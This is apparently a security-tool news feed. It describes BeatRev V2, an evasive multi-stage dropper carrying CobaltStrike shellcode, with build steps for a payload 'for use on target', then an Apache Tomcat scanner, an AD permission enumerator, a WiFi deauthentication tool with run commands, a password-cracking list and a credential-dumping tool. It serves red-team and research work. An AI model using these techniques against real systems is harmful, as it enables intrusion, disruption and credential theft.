  1. I have released all source code
  2. I integrated Stephen Fewer's ReflectiveDLL into the project to replace Stage2
  3. I formatted some of the byte arrays in this project into string format and parse them with UuidFromStringA. This Repo was used as a template. This was done to lower entropy of Stage0 and Stage1
  4. Stage0 has had a fair bit of AV evasion built into it. Thanks to Cerbersec's Project Ares for inspiration
  5. The builder application to produce Stage0 has been included

There are quite a few different things that could be taken from the source code of this project for use elsewhere. Hopefully it will be useful for someone.

Problems with Original Release and Mitigations

There were a few shortcomings with the original release of BeatRev that I decided to try and address.

Stage2 was previously a standalone executable that was stored as the alternate data stream(ADS) of Stage1. In order to acheive the AES encryption-by-victim and subsequent decryption and execution, each time Stage1 was ran it would read the ADS, decrypt it, write back to the ADS, call CreateProcess, and then re-encrypt Stage2 and write it back to disk in the ADS. This was a lot of I/O operations and the CreateProcess call of course wasn't great.

I happened to come upon Steven Fewer's research concerning Reflective DLL's and it seemed like a good fit. Stage2 is now an RDLL; our malware/shellcode runner/whatever we want to protect can be ported to RDLL format and stored as a byte array within Stage1 that is then decrypted on runtime and executed by Stage1. This removes all of the I/O operations and the CreateProcess call from Version1 and is a welcome change.

Stage1 did not have any real kind of AV evasion measures programmed in; this was intentional, as it is extra work and wasn't really the point of this research. During the re-write I took it as an added challenge and added API-hashing to remove functions from the Import Address Table of Stage1. This has helped with detection and Stage1 has a 4/66 detection rate on VirusTotal. I was comfortable uploading Stage1 given that is is already keyed to the original box it was ran on and the file signature constantly changes because of the AES encryption that happens.

I recently started paying attention to entropy as a means to detect malware; to try and lower the otherwise very high entropy that a giant AES encrypted binary blob gives an executable I looked into integrating shellcode stored as UUID's. Because the binary is stored in string representation, there is lower overall entropy in the executable. Using this technique The entropy of Stage0 is now ~6.8 and Stage1 ~4.5 (on a max scale of 8).

Finally it is a giant chore to integrate and produce a complete Stage0 due to all of the pieces that must be manipulated. To make this easier I made a builder application that will ingest a Stage0.c template file, a Stage1 stub, a Stage2 stub, and a raw shellcode file (this was build around Stage2 being a shellcode runner containing CobaltStrike shellcode) and produce a compiled Stage0 payload for use on target.

Technical Details

The Reflective DLL code from Stephen Fewer contains some Visual Studio compiler-specific instructions; I'm sure it is possible to port the technique over to MingW but I do not have the skills to do so. The main problem here is that the CobaltStrike shellcode (stageless is ~265K) needs to go inside the RDLL and be compiled. To get around this and integrate it nicely with the rest of the process I wrote my Stage2 RDLL to contain a global variable chunk of memory that is the size of the CS shellcode; this ~265K chunk of memory has a small placeholder in it that can be located in the compiled binary. The code in src/Stage2 has this added already.

Once compiled, this Stage2stub is transfered to kali where a binary patch may be performed to stick the real CS shellcode into the place in memory that it belongs. This produces the complete Stage2.

To avoid the I/O and CreateProcess fiasco previously described, the complete Stage2 must also be patched into the compiled Stage1 by Stage0; this is necessary in order to allow Stage2 to be encrypted once on-target in addition to preventing Stage2 from being stored separately on disk. The same concept previously described for Stage2 is conducted by Stage0 on target in order to assemble the final Stage1 payload. It should be noted that the memmem function is used in order to locate the placeholder within each stub; this function is no available on Windows, so a custom implementation was used. Thanks to Foxik384 for his code.

In order to perform a binary patch, we must allocate the required memory up front; this has a compounding effect, as Stage1 must now be big enough to also contain Stage2. With the added step of converting Stage2 to a UUID string, Stage2 balloons in size as does Stage1 in order to hold it. A stage2 RDLL with a compiled size of ~290K results in a Stage0 payload of ~1.38M, and a Stage1 payload of ~700K.

The builder application only supports creating x64 EXE's. However with a little more work in theory you could make Stage0 a DLL, as well as Stage1, and have the whole lifecycle exist as a DLL hijack instead of a standalone executable.

Instructions

These instructions will get you on your way to using this POC.

  1. Compile Builder using gcc -o builder src/Builder/BeatRevV2Builder.c
  2. Modify sc_length variable in src/Stage2/dll/src/ReflectiveDLL.c to match the length of raw shellcode file used with builder ( I have included fakesc.bin for example)
  3. Compile Stage2 (in visual studio, ReflectiveDLL project uses some VS compiler-specific instructions)
  4. Move compiled stage2stub.dll back to kali, modify src/Stage1/newstage1.c and define stage2size as the size of stage2stub
  5. Compile stage1stub using x86_64-w64-mingw32-gcc newstage1.c -o stage1stub.exe -s -DUNICODE -Os -L /usr/x86_64-w64-mingw32/lib -l:librpcrt4.a
  6. Run builder using syntax: ./builder src/Stage0/newstage0_exe.c x64 stage1stub.exe stage2stub.dll shellcode.bin
  7. Builder will produce dropper.exe. This is a formatted and compiled Stage0 payload for use on target.

BeatRev Original Release

Introduction

About 6 months ago it occured to me that while I had learned and done a lot with malware concerning AV/EDR evasion, I had spent very little time concerned with trying to evade or defeat reverse engineering/malware analysis. This was for a few good reasons:

  1. I don't know anything about malware analysis or reverse engineering
  2. When you are talking about legal, sanctioned Red Team work there isn't really a need to try and frustrate or defeat a reverse engineer because the activity should have been deconflicted long before it reaches that stage.

Nonetheless it was an interesting thought experiment and I had a few colleagues who DO know about malware analysis that I could bounce ideas off of. It seemed a challenge of a whole different magnitude compared to AV/EDR evasion and one I decided to take a stab at.

Premise

My initial premise was that the malware, on the first time of being ran, would somehow "key" itself to that victim machine; any subsequent attempts to run it would evaluate something in the target environment and compare it for a match in the malware. If those two factors matched, it executes as expected. If they do not (as in the case where the sample had been transfered to a malware analysts sandbox), the malware deletes itself (Once again heavily leaning on the work of LloydLabs and his delete-self-poc).

This "key" must be something "unique" to the victim computer. Ideally it will be a combination of several pieces of information, and then further obfuscated. As an example, we could gather the hostname of the computer as well as the amount of RAM installed; these two values can then be concatenated (e.g. Client018192MB) and then hashed using a user-defined function to produce a number (e.g. 5343823956).

There are a ton of choices in what information to gather, but thought should be given as to what values a Blue Teamer could easily spoof; a MAC address for example may seem like an attractive "unique" identifier for a victim, however MAC addresses can easily be set manually in order for a Reverse Engineer to match their sandbox to the original victim. Ideally the values chosen and enumerated will be one that are difficult for a reverse engineer to replicate in their environment.

With some self-deletion magic, the malware could read itself into a buffer, locate a placeholder variable and replace it with this number, delete itself, and then write the modified malware back to disk in the same location. Combined with an if/else statement in Main, the next time the malware runs it will detect that it has been ran previously and then go gather the hostname and amount of RAM again in order to produce the hashed number. This would then be evaluated against the number stored in the malware during the first run (5343823956). If it matches (as is the case if the malware is running on the same machine as it originally did), it executes as expected however if a different value is returned it will again call the self-delete function in order to remove itself from disk and protect the author from the malware analyst.

This seemed like a fine idea in theory until I spoke with a colleague who has real malware analysis and reverse engineering experience. I was told that a reverse engineer would be able to observe the conditional statement in the malware (if ValueFromFirstRun != GetHostnameAndRAM()), and seeing as the expected value is hard-coded on one side of the conditional statement, simply modify the registers to contain the expected value thus completely bypassing the entire protection mechanism.

This new knowledge completely derailed the thought experiment and seeing as I didn't really have a use for a capability like this in the first place, this is where the project stopped for ~6 months.

Overview

This project resurfaced a few times over the intervening 6 months but each time was little more than a passing thought, as I had gained no new knowledge of reversing/malware analysis and again had no need for such a capability. A few days ago the idea rose again and while still neither of those factors have really changed, I guess I had a little bit more knowledge under my belt and couldn't let go of the idea this time.

With the aforementioned problem regarding hard-coding values in mind, I ultimately decided to go for a multi-stage design. I will refer to them as Stage0, Stage1, and Stage2.

Stage0: Setup. Ran on initial infection and deleted afterwards

Stage1: Runner. Ran each subsequent time the malware executes

Stage2: Payload. The malware you care about protecting. Spawns a process and injects shellcode in order to return a Beacon.

Lifecycle

Stage0

Stage0 is the fresh executable delivered to target by the attacker. It contains Stage1 and Stage2 as AES encrypted byte arrays; this is done to protect the malware in transit, or should a defender somehow get their hands on a copy of Stage0 (which shouldn't happen). The AES Key and IV are contained within Stage0 so in reality this won't protect Stage1 or Stage2 from a competent Blue Teamer.

Stage0 performs the following actions:

  1. Sandbox evasion.
  2. Delete itself from disk. It is still running in memory.
  3. Decrypts Stage1 using stored AES Key/IV and writes to disk in place of Stage0.
  4. Gathers the processor name and the Microsoft ProductID.
  5. Hashes this value and then pads it to fit a 16 byte AES key length. This value reversed serves as the AES IV.
  6. Decrypts Stage2 using stored AES Key/IV.
  7. Encrypts Stage2 using new victim-specific AES Key/IV.
  8. Writes Stage2 to disk as an alternate data stream of Stage1.

At the conclusion of this sequence of events, Stage0 exits. Because it was deleted from disk in step 2 and is no longer running in memory, Stage0 is effectively gone; Without prior knowledge of this technique the rest of the malware lifecycle will be a whole lot more confusing than it already is.

In step 4 the processor name and Microsoft ProductID are gathered; the ProductID is retreived from the Registry, and this value can be manually modified which presents and easy opportunity for a Blue Teamer to match their sandbox to the target environment. Depending on what environmental information is gathered this can become easier or more difficult.

Stage1

Stage1 was dropped by Stage0 and exists in the same exact location as Stage0 did (to include the name). Stage2 is stored as an ADS of Stage1. When the attacker/persistence subsequently executes the malware, they are executing Stage1.

Stage1 performs the following actions:

  1. Sandbox evasion.
  2. Gathers the processor name and the Microsoft ProductID.
  3. Hashes this value and then pads it to fit a 16 byte AES key length. This value reversed serves as the AES IV.
  4. Reads Stage2 from Stage1's ADS into memory.
  5. Decrypts Stage2 using the victim-specific AES Key/IV.
  6. Checks first two bytes of decryted Stage2 buffer; if not MZ (unsuccessful decryption), delete Stage1/Stage2, exit.
  7. Writes decrypted Stage2 back to disk as ADS of Stage1
  8. Calls CreateProcess on Stage2. If this fails (unsuccessful decryption), delete Stage1/Stage2, exit.
  9. Sleeps 5 seconds to allow Stage2 to execute + exit so it can be overwritten.
  10. Encrypts Stage2 using victim-specific AES Key/IV
  11. Writes encrypted Stage2 back to disk as ADS of Stage1.

Note that Stage2 MUST exit in order for it to be overwritten; the self-deletion trick does not appear to work on files that are already ADS's, as the self-deletion technique relies on renaming the primary data stream of the executable. Stage2 will ideally be an inject or spawn+inject executable.

There are two points that Stage1 could detect that it is not being ran from the same victim and delete itself/Stage2 in order to protect the threat actor. The first is the check for the executable header after decrypting Stage2 using the gathered environmental information; in theory this step could be bypassed by a reverse engineer, but it is a first good check. The second protection point is the result of the CreateProcess call- if it fails because Stage2 was not properly decrypted, the malware is similiary deleted. The result of this call could also be modified to prevent deletion by the reverse engineer, however this doesn't change the fact that Stage2 is encrypted and inaccessible.

Stage2

Stage2 is the meat and potatoes of the malware chain; It is a fully fledged shellcode runner/piece of malware itself. By encrypting and protecting it in the way that we have, the actions of the end state malware are much better obfuscated and protected from reverse engineers and malware analysts. During development I used one of my existing shellcode runners containing CobaltStrike shellcode, but this could be anything the attacker wants to run and protect.

Impact, Mitigation, and Further Work

So what is actually accomplished with a malware lifecycle like this? There are a few interesting quirks to talk about.

Alternate data streams are a feature unique to NTFS file systems; this means that most ways of transfering the malware after initial infection will strip and lose Stage2 because it is an ADS of Stage1. Special care would have to be given in order to transfer the sample in order to preserve Stage2, as without it a lot of reverse engineers and malware analysts are going to be very confused as to what is happening. RAR archives are able to preserve ADS's and tools like 7Z and Peazip can extract files and their ADS's.

As previously mentioned, by the time malware using this lifecycle hits a Blue Teamer it should be at Stage1; Stage0 has come and gone, and Stage2 is already encrypted with the environmental information gathered by stage 0. Not knowing that Stage0 even existed will add considerable uncertainty to understanding the lifecycle and decrypting Stage2.

In theory (because again I have no reversing experience), Stage1 should be able to be reversed (after the Blue Teamers rolls through a few copies of it because it keeps deleting itself) and the information that Stage1 gathers from the target system should be able to be identified. Provided a well-orchestrated response, Blue Team should be able to identify the victim that the malware came from and go and gather that information from it and feed it into the program so that it may be transformed appropriately into the AES Key/IV that decrypts Stage2. There are a lot "ifs" in there however related to the relative skill of the reverse engineer as well as the victim machine being available for that information to be recovered.

Application Whitelisting would significantly frustrate this lifecycle. Stage0/Stage1 may be able to be side loaded as a DLL, however I suspect that Stage2 as an ADS would present some issues. I do not have an environment to test malware against AWL nor have I bothered porting this all to DLL format so I cannot say. I am sure there are creative ways around these issues.

I am also fairly confident that there are smarter ways to run Stage2 than dropping to disk and calling CreateProcess; Either manually mapping the executable or using a tool like Donut to turn it into shellcode seem like reasonable ideas.

Code and binary

During development I created a Builder application that Stage1 and Stage2 may be fed to in order to produce a functional Stage0; this will not be provided however I will be providing most of the source code for stage1 as it is the piece that would be most visible to a Blue Teamer. Stage0 will be excluded as an exercise for the reader, and stage2 is whatever standalone executable you want to run+protect. This POC may be further researched at the effort and discretion of able readers.

I will be providing a compiled copy of this malware as Dropper64.exe. Dropper64.exe is compiled for x64. Dropper64.exe is Stage0; it contains Stage1 and Stage2. On execution, Stage1 and Stage2 will drop to disk but will NOT automatically execute, you must run Dropper64.exe(now Stage1) again. Stage2 is an x64 version of calc.exe. I am including this for any Blue Teamers who want to take a look at this, but keep in mind in an incident response scenario 99& of the time you will be getting Stage1/Stage2, Stage0 will be gone.

Conclusion

This was an interesting pet project that ate up a long weekend. I'm sure it would be a lot more advanced/more complete if I had experience in a debugger and disassembler, but you do the best with what you have. I am eager to hear from Blue Teamers and other Malware Devs what they think. I am sure I have over-complicatedly re-invented the wheel here given what actual APT's are doing, but I learned a few things along the way. Thank you for reading!



ApacheTomcatScanner - A Python Script To Scan For Apache Tomcat Server Vulnerabilities

By: Zion3R
3 September 2022 at 12:30


A python script to scan for Apache Tomcat server vulnerabilities.


Features

  • Multithreaded workers to search for Apache tomcat servers.
  • Multiple target source possible:
    • Retrieving list of computers from a Windows domain through an LDAP query to use them as a list of targets.
    • Reading targets line by line from a file.
    • Reading individual targets (IP/DNS/CIDR) from -tt/--target option.
  • Custom list of ports to test.
  • Tests for /manager/html access and default credentials.
  • List the CVEs of each version with the --list-cves option

Installation

You can now install it from pypi with this command:

sudo python3 -m pip install apachetomcatscanner

Usage

$ ./ApacheTomcatScanner.py -h
Apache Tomcat Scanner v2.3.2 - by @podalirius_

usage: ApacheTomcatScanner.py [-h] [-v] [--debug] [-C] [-T THREADS] [-s] [--only-http] [--only-https] [--no-check-certificate] [--xlsx XLSX] [--json JSON] [-PI PROXY_IP] [-PP PROXY_PORT] [-rt REQUEST_TIMEOUT] [-tf TARGETS_FILE]
[-tt TARGET] [-tp TARGET_PORTS] [-ad AUTH_DOMAIN] [-ai AUTH_DC_IP] [-au AUTH_USER] [-ap AUTH_PASSWORD] [-ah AUTH_HASH]

A python script to scan for Apache Tomcat server vulnerabilities.

optional arguments:
-h, --help show this help message and exit
-v, --verbose Verbose mode. (default: False)
--debug Debug mode, for huge verbosity. (default: False)
-C, --list-cves List CVE ids affecting each version found. (default: False)
-T THREADS, --threads THREADS
Number of threads (default: 5)
-s, --servers-only If querying ActiveDirectory, only get servers and not all computer objects. (default: False)
--only-http Scan only with HTTP scheme. (default: False, scanning with both HTTP and HTTPs)
--only-https Scan only with HTTPs scheme. (default: False, scanning with both HTTP and HTTPs)
--no-check-certificate
Do not check certificate. (default: False)
--xlsx XLSX Export results to XLSX
--json JSON Export results to JSON

-PI PROXY_IP, --proxy-ip PROXY_IP
Proxy IP.
-PP PROXY_PORT, --proxy-port PROXY_PORT
Proxy port
-rt REQUEST_TIMEOUT, --request-timeout REQUEST_TIMEOUT

-tf TARGETS_FILE, --targets-file TARGETS_FILE
Path to file containing a line by line list of targets.
-tt TARGET, --target TARGET
Target IP, FQDN or CIDR
-tp TARGET_PORTS, --target-ports TARGET_PORTS
Target ports to scan top search for Apache Tomcat servers.
-ad AUTH_DOMAIN, --auth-domain AUTH_DOMAIN
Windows domain to authenticate to.
-ai AUTH_DC_IP, --auth-dc-ip AUTH_DC_IP
IP of the domain controller.
-au AUTH_USER, --auth-user AUTH_USER
Username of the domain account.
-ap AUTH_PASSWORD, --auth-password AUTH_PASSWORD
Password of the domain account.
-ah AUTH_HASH, --auth-hash AUTH_HASH
LM:NT hashes to pass the hash for this user.

Example


 

You can also list the CVEs of each version with the --list-cves option:



Contributing

Pull requests are welcome. Feel free to open an issue if you want to add other features.



Aced - Tool to parse and resolve a single targeted Active Directory principal's DACL

By: Zion3R
2 September 2022 at 12:30


Aced is a tool to parse and resolve a single targeted Active Directory principal's DACL. Aced will identify interesting inbound access allowed privileges against the targeted account, resolve the SIDS of the inbound permissions, and present that data to the operator. Additionally, the logging features of pyldapsearch have been integrated with Aced to log the targeted principal's LDAP attributes locally which can then be parsed by pyldapsearch's companion tool BOFHound to ingest the collected data into BloodHound.


Use case?

I wrote Aced simply because I wanted a more targeted approach to query ACLs. Bloodhound is fantastic, however, it is extremely noisy. Bloodhound collects all the things while Aced collects a single thing providing the operator more control over how and what data is collected. There's a phrase the Navy Seals use: "slow is smooth and smooth is fast" and that's the approach I tried to take with Aced. The case for detection is reduced by only querying for what LDAP wants to tell you and by not performing an action known as "expensive ldap queries". Aced has the option to forego SMB connections for hostname resolution. You have the option to prefer LDAPS over LDAP. With the additional integration with BloodHound, the collected data can be stored in a familiar format that can be shared with a team. Privilege escalation attack paths can be built by walking backwards from the targeted goal.

References

Thanks to the below for all the code I stole:
@_dirkjan
@fortaliceLLC
@eloygpz
@coffeegist
@tw1sm

Usage

└─# python3 aced.py -h                             


_____
|A . | _____
| /.\ ||A ^ | _____
|(_._)|| / \ ||A _ | _____
| | || \ / || ( ) ||A_ _ |
|____V|| . ||(_'_)||( v )|
|____V|| | || \ / |
|____V|| . |
|____V|
v1.0

Parse and log a target principal's DACL.
@garrfoster

usage: aced.py [-h] [-ldaps] [-dc-ip DC_IP] [-k] [-no-pass] [-hashes LMHASH:NTHASH] [-aes hex key] [-debug] [-no-smb] target

Tool to enumerate a single target's DACL in Active Directory

optional arguments:
-h, --help show this help message and exit

Authentication:
target [[domain/username[:password]@]<address>
-ldaps Use LDAPS isntead of LDAP

Optional Flags:
-dc-ip DC_IP IP address or FQDN of domain controller
-k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
credentials cannot be found, it will use the ones specified in the command line
-no-pass don't ask for password (useful for -k)
-hashes LMHASH:NTHASH
LM and NT hashes, format is LMHASH:NTHASH
-aes hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-debug Enable verbose logging.
-no-smb Do not resolve DC hostname through SMB. Requires a FQDN with -dc-ip.

Demo

In the below demo, we have the credentials for the corp.local\lowpriv account. By starting enumeration at Domain Admins, a potential path for privilege escalation is identified by walking backwards from the high value target.


And here's how that data looks when transformed by bofhound and ingested into BloodHound.




Autodeauth - A Tool Built To Automatically Deauth Local Networks

By: Zion3R
1 September 2022 at 12:30


A tool built to automatically deauth local networks

Setup

$ chmod +x setup.sh
$ sudo ./setup.sh
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Please enter your WiFi interface name e.g: wlan0 -> wlan1
autodeauth installed

use sudo autodeauth or systemctl start autodeauth

to edit service setting please edit: service file: /etc/systemd/system/autodeauth.service

Options

$ sudo autodeauth -h
_ _ ___ _ _
/_\ _ _| |_ ___| \ ___ __ _ _ _| |_| |_
/ _ \ || | _/ _ \ |) / -_) _` | || | _| ' \
/_/ \_\_,_|\__\___/___/\___\__,_|\_,_|\__|_||_|

usage: autodeauth [-h] --interface INTERFACE [--blacklist BLACKLIST] [--whitelist WHITELIST] [--led LED] [--time TIME] [--random] [--ignore] [--count COUNT] [--verbose VERBOSE]

Auto Deauth Tool

options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Interface to fetch WiFi networks and send deauth packets (must support packet injection)
--blacklist BLACKLIST, -b BLACKLIST
List of networks ssids/mac addre sses to avoid (Comma seperated)
--whitelist WHITELIST, -w WHITELIST
List of networks ssids/mac addresses to target (Comma seperated)
--led LED, -l LED Led pin number for led display
--time TIME, -t TIME Time (in s) between two deauth packets (default 0)
--random, -r Randomize your MAC address before deauthing each network
--ignore Ignore errors encountered when randomizing your MAC address
--count COUNT, -c COUNT
Number of packets to send (default 5000)
--verbose VERBOSE, -v VERBOSE
Scapy verbosity setting (default: 0)

Usage

After running the setup you are able to run the script by using autodeauth from any directory

Command line

Networks with spaces can be represented using their mac addresses

$ sudo autodeauth -i wlan0 --blacklist FreeWiFi,E1:DB:12:2F:C1:57 -c 10000

Service

$ sudo systemctl start autodeauth

Loot and Log files

Loot

When a network is detected and fits under the whitelist/blacklist criteria its network information is saved as a json file in /var/log/autodeauth/

{
"ssid": "MyWiFiNetwork",
"mac_address": "10:0B:21:2E:C1:11",
"channel": 1,
"network.frequency": "2.412 GHz",
"mode": "Master",
"bitrates": [
"6 Mb/s",
"9 Mb/s",
"12 Mb/s",
"18 Mb/s",
"24 Mb/s",
"36 Mb/s",
"48 Mb/s",
"54 Mb/s"
],
"encryption_type": "wpa2",
"encrypted": true,
"quality": "70/70",
"signal": -35
}

Log File

$ cat /var/log/autodeauth/log               
2022-08-20 21:01:31 - Scanning for local networks
2022-08-20 21:20:29 - Sending 5000 deauth frames to network: A0:63:91:D5:B8:76 -- MyWiFiNetwork
2022-08-20 21:21:00 - Exiting/Cleaning up

Edit Service Config

To change the settings of the autodeauth service edit the file /etc/systemd/system/autodeauth.service
Lets say you wanted the following config to be setup as a service

$ sudo autodeauth -i wlan0 --blacklist FreeWiFi,myWifi -c 10000
$ vim /etc/systemd/system/autodeauth.service

Then you would change the ExecStart line to

ExecStart=/usr/bin/python3 /usr/local/bin/autodeauth -i wlan0 --blacklist FreeWiFi,myWifi -c 10000


Awesome-Password-Cracking - A Curated List Of Awesome Tools, Research, Papers And Other Projects Related To Password Cracking And Password Security

By: Zion3R
31 August 2022 at 12:30


A curated list of awesome tools, research, papers and other projects related to password cracking and password security.

Read the guidelines before contributing! In short:


Books

Cloud

  • Cloud_crack - Crack passwords using Terraform and AWS.
  • Cloudcat - A script to automate the creation of cloud infrastructure for hash cracking.
  • Cloudstomp - Automated deployment of instances on EC2 via plugin for high CPU/GPU applications at the lowest price.
  • Cloudtopolis - A tool that facilitates the installation and provisioning of Hashtopolis on the Google Cloud Shell platform, quickly and completely unattended (and also, free!).
  • NPK - NPK is a distributed hash-cracking platform built entirely of serverless components in AWS including Cognito, DynamoDB, and S3.
  • Penglab - Abuse of Google Colab for cracking hashes.
  • Rook - Automates the creation of AWS p3 instances for use in GPU-based password cracking.

Conversion

  • 7z2hashcat - Extract information from password-protected .7z archives (and .sfx files) such that you can crack these "hashes" with hashcat.
  • MacinHash - Convert macOS plist password file to hash file for password crackers.
  • NetNTLM-Hashcat - Converts John The Ripper/Cain format hashes (singular, or in bulk) to HashCat compatible hash format.
  • Rubeus-to-Hashcat - Converts / formats Rubeus kerberoasting output into hashcat readable format.
  • WINHELLO2hashcat - With this tool one can extract the "hash" from a WINDOWS HELLO PIN. This hash can be cracked with Hashcat.
  • bitwarden2hashcat - A tool that converts Bitwarden's data into a hashcat-suitable hash.
  • hc_to_7z - Convert 7-Zip hashcat hashes back to 7z archives.
  • hcxtools - Portable solution for conversion of cap/pcap/pcapng (gz compressed) WiFi dump files to hashcat formats.
  • itunes_backup2hashcat - Extract the information needed from the Manifest.plist files to convert it to hashes compatible with hashcat.
  • mongodb2hashcat - Extract hashes from the MongoDB database server to a hash format that hashcat accepts: -m 24100 (SCRAM-SHA-1) or -m 24200 (SCRAM-SHA-256).

Hashcat

Hashcat is the "World's fastest and most advanced password recovery utility." The following are projects directly related to Hashcat in one way or another.

  • Autocrack - A set of client and server tools for automatically, and lightly automatically cracking hashes.
  • docker-hashcat - Latest hashcat docker for Ubuntu 18.04 CUDA, OpenCL, and POCL.
  • Hashcat-Stuffs - Collection of hashcat lists and things.
  • hashcat-utils - Small utilities that are useful in advanced password cracking.
  • Hashfilter - Read a hashcat potfile and parse different types into a sqlite database.
  • known_hosts-hashcat - A guide and tool for cracking ssh known_hosts files with hashcat.
  • pyhashcat - Python C API binding to libhashcat.

Automation

  • autocrack - Hashcat wrapper to help automate the cracking process.
  • hashcat.launcher - A cross-platform app that run and control hashcat.
  • hat - An Automated Hashcat Tool for common wordlists and rules to speed up the process of cracking hashes during engagements.
  • hate_crack - A tool for automating cracking methodologies through Hashcat from the TrustedSec team.
  • Naive hashcat - Naive hashcat is a plug-and-play script that is pre-configured with naive, emperically-tested, "good enough" parameters/attack types.

Distributed cracking

  • CrackLord - Queue and resource system for cracking passwords.
  • fitcrack - A hashcat-based distributed password cracking system.
  • Hashtopolis - A multi-platform client-server tool for distributing hashcat tasks to multiple computers.
  • Kraken - A multi-platform distributed brute-force password cracking system.

Rules

  • clem9669 rules - Rule for hashcat or john.
  • hashcat rules collection - Probably the largest collection of hashcat rules out there.
  • Hob0Rules - Password cracking rules for Hashcat based on statistics and industry patterns.
  • Kaonashi - Wordlist, rules and masks from Kaonashi project (RootedCON 2019).
  • nsa-rules - Password cracking rules and masks for hashcat generated from cracked passwords.
  • nyxgeek-rules - Custom password cracking rules for Hashcat and John the Ripper.
  • OneRuleToRuleThemAll - "One rule to crack all passwords. or atleast we hope so."
  • pantagrule - Large hashcat rulesets generated from real-world compromised passwords.

Rule tools

  • duprule - Detect & filter duplicate hashcat rules.

Web interfaces

  • crackerjack - CrackerJack is a Web GUI for Hashcat developed in Python.
  • CrackQ - A Python Hashcat cracking queue system.
  • hashpass - Hash cracking WebApp & Server for hashcat.
  • Hashview - A web front-end for password cracking and analytics.
  • Wavecrack - Wavestone's web interface for password cracking with hashcat.
  • WebHashCat - WebHashcat is a very simple but efficient web interface for hashcat password cracking tool.

John the Ripper

John the Ripper is "an Open Source password security auditing and password recovery tool available for many operating systems." The following are projects directly related to John the Ripper in one way or another.

  • BitCracker - BitCracker is the first open source password cracking tool for memory units encrypted with BitLocker.
  • johnny - GUI frontend to John the Ripper.

Misc

  • hashID - Software to identify the different types of hashes.
  • Name That Hash - Don't know what type of hash it is? Name That Hash will name that hash type! Identify MD5, SHA256 and 300+ other hashes. Comes with a neat web app.

Websites

Communities

  • hashcat Forum - Forum by the developers of hashcat.
  • Hashmob - A growing password recovery community aimed towards being a center point of collaboration for cryptography enthusiasts.
  • Hashkiller Forum - A password cracking forum with over 20,000 registered users.

Lookup services

  • CMD5 - Provides online MD5 / sha1/ mysql / sha256 encryption and decryption services.
  • CrackStation - Free hash lookup service supplying wordlists as well.
  • Hashes.com - A hash lookup service with paid features.
  • Hashkiller - A hash lookup service with a forum.
  • Online Hash Crack - Cloud password recovery service.

Wordlist tools

Tools for analyzing, generating and manipulating wordlists.

Analysis

  • PACK - A collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics.
  • pcfg_cracker - This project uses machine learning to identify password creation habits of users.
  • Pipal - THE password analyser.

Generation/Manipulation

  • common-substr - Simple tool to extract the most common substrings from an input text. Built for password cracking.
  • Crunch - Crunch is a wordlist generator where you can specify a standard character set or a character set you specify. Crunch can generate all possible combinations and permutations.
  • CUPP - A tool that lets you generate wordlists by user profiling data such as birthday, nickname, address, name of a pet or relative etc.
  • duplicut - Remove duplicates from MASSIVE wordlist, without sorting it (for dictionary-based password cracking).
  • Gorilla - Tool for generating wordlists or extending an existing one using mutations.
  • Keyboard-Walk-Generators - Generate Keyboard Walk Dictionaries for cracking.
  • kwprocessor - Advanced keyboard-walk generator with configureable basechars, keymap and routes.
  • maskprocessor - High-performance word generator with a per-position configureable charset.
  • maskuni - A standalone fast word generator in the spirit of hashcat's mask generator with unicode support.
  • Mentalist - Mentalist is a graphical tool for custom wordlist generation. It utilizes common human paradigms for constructing passwords and can output the full wordlist as well as rules compatible with Hashcat and John the Ripper.
  • Phraser - Phraser is a phrase generator using n-grams and Markov chains to generate phrases for passphrase cracking.
  • princeprocessor - Standalone password candidate generator using the PRINCE algorithm.
  • Rephraser - A Python-based reimagining of Phraser using Markov-chains for linguistically-correct password cracking.
  • Rling - RLI Next Gen (Rling), a faster multi-threaded, feature rich alternative to rli found in hashcat utilities.
  • statsprocessor - Word generator based on per-position markov-chains.
  • TTPassGen - Flexible and scriptable password dictionary generator which supportss brute-force, combination, complex rule modes etc.
  • token-reverser - Words list generator to crack security tokens.
  • WikiRaider - WikiRaider enables you to generate wordlists based on country specific databases of Wikipedia.

Wordlists

Laguage specific

  • Albanian wordlist - A mix of names, last names and some albanian literature.
  • Danish Phone Wordlist Generator - This tool can generate wordlists of Danish phone numbers by area and/or usage (Mobile, landline etc.) Useful for password cracking or fuzzing Danish targets.
  • Danish Wordlists - Collection of danish wordlists for cracking danish passwords.
  • French Wordlists - This project aim to provide french word list about everything a person could use as a base password.

Other

  • Packet Storm Wordlists - A substantial collection of different wordlists in multiple languages.
  • Rocktastic - Includes many permutations of passwords and patterns that have been observed in the wild.
  • RockYou2021 - RockYou2021.txt is a MASSIVE WORDLIST compiled of various other wordlists.
  • WeakPass - Collection of large wordlists.

Specific file formats

PDF

  • pdfrip - A multi-threaded PDF password cracking utility equipped with commonly encountered password format builders and dictionary attacks.

PEM

JKS

  • JKS private key cracker - Cracking passwords of private key entries in a JKS fileCracking passwords of private key entries in a JKS file.

ZIP

  • bkcrack - Crack legacy zip encryption with Biham and Kocher's known plaintext attack.
  • frackzip - Small tool for cracking encrypted ZIP archives.

Artificial Intelligence

  • adams - Reducing Bias in Modeling Real-world Password Strength via Deep Learning and Dynamic Dictionaries. - Code for cracking passwords with neural networks.
  • RNN-Passwords - Using the char-rnn to learn and guess passwords.
  • rulesfinder - This tool finds efficient password mangling rules (for John the Ripper or Hashcat) for a given dictionary and a list of passwords.

Research

Papers

Talks



Masky - Python Library With CLI Allowing To Remotely Dump Domain User Credentials Via An ADCS Without Dumping The LSASS Process Memory

By: Zion3R
30 August 2022 at 12:30


Masky is a python library providing an alternative way to remotely dump domain users' credentials thanks to an ADCS. A command line tool has been built on top of this library in order to easily gather PFX, NT hashes and TGT on a larger scope.

This tool does not exploit any new vulnerability and does not work by dumping the LSASS process memory. Indeed, it only takes advantage of legitimate Windows and Active Directory features (token impersonation, certificate authentication via kerberos & NT hashes retrieval via PKINIT). A blog post was published to detail the implemented technics and how Masky works.

Masky source code is largely based on the amazing Certify and Certipy tools. I really thanks their authors for the researches regarding offensive exploitation technics against ADCS (see. Acknowledgments section).


Installation

Masky python3 library and its associated CLI can be simply installed via the public PyPi repository as following:

pip install masky

The Masky agent executable is already included within the PyPi package.

